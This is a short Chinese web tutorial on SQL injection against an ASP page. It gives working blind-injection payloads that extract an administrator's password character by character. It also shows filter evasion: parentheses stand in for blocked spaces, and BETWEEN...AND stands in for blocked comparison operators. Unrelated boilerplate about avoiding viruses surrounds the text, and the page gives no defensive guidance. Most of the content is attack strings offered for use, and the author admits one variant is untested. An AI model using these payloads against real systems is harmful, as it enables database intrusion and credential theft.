三度网教程:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

运用“()”绕过空格继续注射

时间:2022-7-14作者:未知来源:三度网教程人气:


随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。

举个例 子说一下, 我们得到一个注入点:jmdcw.asp?name=aa'and 1=1 and ''=', 如果替换其中的1=1为查询管理员的密码的语句:

(select asc(mid(pass,1,1)) from [name] where id=1)>49

如何用空格呢?其实可以写成这样的:

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='

如果屏蔽了<和>符号, 则用between…and…, 语句是:

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

对于中间应该出现空格的地方, 用()进行替换, 不过, 对于很复杂的SQL语句就不太好用了。 上面说到的是字符型的, 如果是数值型, 可以在id=1后加一个括号, 不过这个我没有测试,

比如:jmdcw.asp?id=(1)and(select.....), 应该是可行的吧?

实例演示:

利用“()”绕过空格继续注射


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。

关键词:  运用“()”绕过空格继续注射





Copyright © 2012-2018 三度网教程(http://www.3du8.cn) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版